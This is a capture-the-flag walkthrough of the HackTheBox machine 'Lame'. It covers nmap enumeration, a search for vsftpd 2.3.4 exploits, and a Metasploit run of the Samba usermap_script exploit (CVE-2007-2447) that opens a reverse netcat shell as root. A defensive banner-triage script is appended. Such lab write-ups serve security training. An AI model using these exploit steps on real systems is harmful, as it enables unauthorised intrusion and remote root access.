Linux/Lame

Lame

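While browsing around today I found that this machine appears to be the first machine on the HackTheBox platform, and I had not done it yet. Judging by its description it is a very easy machine, so let's run through it quickly.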

Enumeration

nmap

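First, scan the common ports with nmap; the system exposes ports 21, 22, 139 and 445. Then scan these 4 ports for detailed information: the FTP service on port 21 is vsftpd 2.3.4 and it allows anonymous login, but after logging in as anonymous the directory turns out to be empty.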

┌──(kali㉿kali)-[~/vegetable/HTB/Lame]
└─$ nmap -sC -sV -p 21,22,139,445 10.10.10.3 -Pn
Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-07 22:51 EDT
Nmap scan report for 10.10.10.3
Host is up (0.91s latency).

PORT    STATE    SERVICE     VERSION
21/tcp  open     ftp         vsftpd 2.3.4
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.14.13
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp  filtered ssh
139/tcp filtered netbios-ssn
445/tcp open     netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Service Info: OS: Unix

Host script results:
|_clock-skew: mean: 1h56m42s, deviation: 2h49m44s, median: -3m19s
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name: 
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2024-04-07T22:49:09-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 126.73 seconds

21/ftp vsftpd 2.3.4

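This version has a backdoor vulnerability. I tried to exploit it without success and did not want to dwell on it, so I moved straight on to SMB.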

┌──(kali㉿kali)-[~/vegetable/HTB/Lame]
└─$ searchsploit vsftpd 2.3.4      
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                           |  Path
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
vsftpd 2.3.4 - Backdoor Command Execution                                                                                | unix/remote/49757.py
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)                                                                   | unix/remote/17491.rb
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

445/Samba

The Metasploit framework can be used directly to exploit CVE-2007-2447.

┌──(kali㉿kali)-[~/vegetable/HTB/Lame]
└─$ msfconsole
                                                  


       =[ metasploit v6.2.26-dev                          ]
+ -- --=[ 2264 exploits - 1189 auxiliary - 404 post       ]
+ -- --=[ 951 payloads - 45 encoders - 11 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: You can use help to view all 
available commands
Metasploit Documentation: https://docs.metasploit.com/

msf6 > exploit/multi/samba/usermap_script
[-] Unknown command: exploit/multi/samba/usermap_script
This is a module we can load. Do you want to use exploit/multi/samba/usermap_script? [y/N]   y
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(multi/samba/usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT   139              yes       The target port (TCP)


Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.50.105   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf6 exploit(multi/samba/usermap_script) > set rhosts 10.10.10.3
rhosts => 10.10.10.3
msf6 exploit(multi/samba/usermap_script) > set lhost 10.10.14.13
lhost => 10.10.14.13
msf6 exploit(multi/samba/usermap_script) > run

[*] Started reverse TCP handler on 10.10.14.13:4444 
[*] Command shell session 1 opened (10.10.14.13:4444 -> 10.10.10.3:48732) at 2024-04-07 23:38:42 -0400

shell
[*] Trying to find binary 'python' on the target machine


whoami[*] Found python at /usr/bin/python
[*] Using `python` to pop up an interactive shell
[*] Trying to find binary 'bash' on the target machine

[*] Found bash at /bin/bash
root@lame:/# 
root@lame:/# 
root@lame:/# whoami
root
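From the defender's side, the two findings this walkthrough relies on (the vsftpd 2.3.4 banner and a Samba version exposed to CVE-2007-2447) can be flagged straight from `nmap -sV` output during a patch audit. The following is an added example, not part of the original post: the function names are hypothetical, the sample input is constructed from the scan above, and the affected Samba range (3.0.0 through 3.0.25rc3) is taken from the CVE-2007-2447 advisory.

```python
import re

# Constructed sample: service lines taken from the nmap output shown earlier.
SAMPLE_SCAN = """\
PORT    STATE    SERVICE     VERSION
21/tcp  open     ftp         vsftpd 2.3.4
22/tcp  filtered ssh
139/tcp filtered netbios-ssn
445/tcp open     netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
|_  message_signing: disabled (dangerous, but default)
"""

SERVICE_LINE = re.compile(r"^(\d+)/tcp\s+(\S+)\s+(\S+)\s*(.*)$")
SAMBA_VERSION = re.compile(r"Samba smbd (\d+)\.(\d+)\.(\d+)((?:rc|pre)\d+)?")

def samba_in_cve_2007_2447_range(banner):
    """True when the banner reports Samba 3.0.0 through 3.0.25rc3."""
    m = SAMBA_VERSION.search(banner)
    if not m:
        return False  # e.g. nmap's vague "3.X - 4.X" guess: cannot decide
    major, minor, patch = (int(x) for x in m.group(1, 2, 3))
    if (major, minor) != (3, 0):
        return False
    if patch < 25:
        return True
    # 3.0.25 final carries the fix; only its pre-release builds are affected.
    return patch == 25 and m.group(4) is not None

def triage(scan_text):
    """Return (port, finding) tuples for open services that need attention."""
    findings = []
    for line in scan_text.splitlines():
        m = SERVICE_LINE.match(line)
        if m:
            port, state, _service, banner = m.groups()
            if state != "open":
                continue  # filtered/closed ports are not reachable services
            if re.search(r"\bvsftpd 2\.3\.4\b", banner):
                findings.append((int(port), "vsftpd 2.3.4: backdoored release"))
            if samba_in_cve_2007_2447_range(banner):
                findings.append((int(port), "Samba in CVE-2007-2447 range"))
        elif "message_signing: disabled" in line:
            findings.append((None, "SMB message signing disabled"))
    return findings

if __name__ == "__main__":
    for port, finding in triage(SAMPLE_SCAN):
        print(port, finding)
```

A banner match only reflects the reported version string; distribution packages with backported fixes still need to be checked against the vendor's changelog.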

This is a very old machine and I don't want to dwell on it any further, so that's it!
